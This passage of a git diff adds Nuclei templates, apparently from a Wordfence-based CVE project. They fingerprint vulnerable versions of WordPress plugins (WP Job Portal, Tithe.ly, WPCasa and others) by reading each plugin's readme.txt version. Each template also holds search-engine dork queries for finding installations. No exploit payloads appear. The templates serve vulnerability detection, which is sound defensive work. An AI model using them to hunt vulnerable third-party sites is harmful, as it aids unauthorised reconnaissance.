+ tags: cve,wordpress,wp-plugin,wp-job-portal,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-job-portal"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.2')
\ No newline at end of file
diff --git a/poc/wordpress/wp-job-portal-ae4beac744bf60cad4d49b935292f33a.yaml b/poc/wordpress/wp-job-portal-ae4beac744bf60cad4d49b935292f33a.yaml
new file mode 100644
index 0000000000..f3788c4695
--- /dev/null
+++ b/poc/wordpress/wp-job-portal-ae4beac744bf60cad4d49b935292f33a.yaml
@@ -0,0 +1,59 @@
+id: wp-job-portal-ae4beac744bf60cad4d49b935292f33a
+
+info:
+ name: >
+ WP Job Portal <= 2.2.2 - Missing Authorization to Limited Privilege Escalation
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4107199d-e3c7-4379-b39d-1868de7d777b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-job-portal/"
+ google-query: inurl:"/wp-content/plugins/wp-job-portal/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-job-portal,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-job-portal"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.2')
\ No newline at end of file
diff --git a/poc/wordpress/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml b/poc/wordpress/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml
new file mode 100644
index 0000000000..9fe7706c2e
--- /dev/null
+++ b/poc/wordpress/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml
@@ -0,0 +1,59 @@
+id: wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd
+
+info:
+ name: >
+ WP Job Portal <= 2.2.1 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d8961fd-68ac-4a10-ab26-cfcda27c18e8?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-job-portal/"
+ google-query: inurl:"/wp-content/plugins/wp-job-portal/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-job-portal,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-job-portal"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.1')
\ No newline at end of file
diff --git a/poc/wordpress/wp-job-portal-fa33fbce4070912e4a2de446cc7f9493.yaml b/poc/wordpress/wp-job-portal-fa33fbce4070912e4a2de446cc7f9493.yaml
new file mode 100644
index 0000000000..01b3fb98c8
--- /dev/null
+++ b/poc/wordpress/wp-job-portal-fa33fbce4070912e4a2de446cc7f9493.yaml
@@ -0,0 +1,59 @@
+id: wp-job-portal-fa33fbce4070912e4a2de446cc7f9493
+
+info:
+ name: >
+ WP Job Portal <= 2.2.2 - Authenticated (Admin+) SQL Injection via getFieldsForVisibleCombobox()
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/505858dc-c420-484c-a067-6962836eea6a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-job-portal/"
+ google-query: inurl:"/wp-content/plugins/wp-job-portal/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-job-portal,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-job-portal"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.2')
\ No newline at end of file
diff --git a/poc/wordpress/wp-photo-text-slider-50-b363eafeebe4e86c4b8a3cfae536824b.yaml b/poc/wordpress/wp-photo-text-slider-50-b363eafeebe4e86c4b8a3cfae536824b.yaml
new file mode 100644
index 0000000000..bb5a5ba466
--- /dev/null
+++ b/poc/wordpress/wp-photo-text-slider-50-b363eafeebe4e86c4b8a3cfae536824b.yaml
@@ -0,0 +1,59 @@
+id: wp-photo-text-slider-50-b363eafeebe4e86c4b8a3cfae536824b
+
+info:
+ name: >
+ Wp photo text slider 50 <= 8.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f98f11da-b0ae-4c00-9708-88d6044abda2?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-photo-text-slider-50/"
+ google-query: inurl:"/wp-content/plugins/wp-photo-text-slider-50/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-photo-text-slider-50,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-photo-text-slider-50/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-photo-text-slider-50"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 8.1')
\ No newline at end of file
diff --git a/poc/wordpress/wp-tithely.yaml b/poc/wordpress/wp-tithely.yaml
new file mode 100644
index 0000000000..c844b1c49d
--- /dev/null
+++ b/poc/wordpress/wp-tithely.yaml
@@ -0,0 +1,59 @@
+id: wp-tithely-fa54958de0b95d943c97eef399cbadee
+
+info:
+ name: >
+ Tithe.ly Giving Button <= 1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/569f2250-971a-4000-9114-67e609ec907d?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-tithely/"
+ google-query: inurl:"/wp-content/plugins/wp-tithely/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-tithely,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-tithely/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-tithely"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/wordpress/wpcasa.yaml b/poc/wordpress/wpcasa.yaml
new file mode 100644
index 0000000000..c11a789eef
--- /dev/null
+++ b/poc/wordpress/wpcasa.yaml
@@ -0,0 +1,59 @@
+id: wpcasa-639a6c2d23467f866364578ced73357f
+
+info:
+ name: >
+ WPCasa <= 1.2.13 - Insecure Direct Object Reference
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d1e5030-fb78-47da-b571-048b97c9ff9e?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wpcasa/"
+ google-query: inurl:"/wp-content/plugins/wpcasa/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wpcasa,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpcasa/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpcasa"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.13')
\ No newline at end of file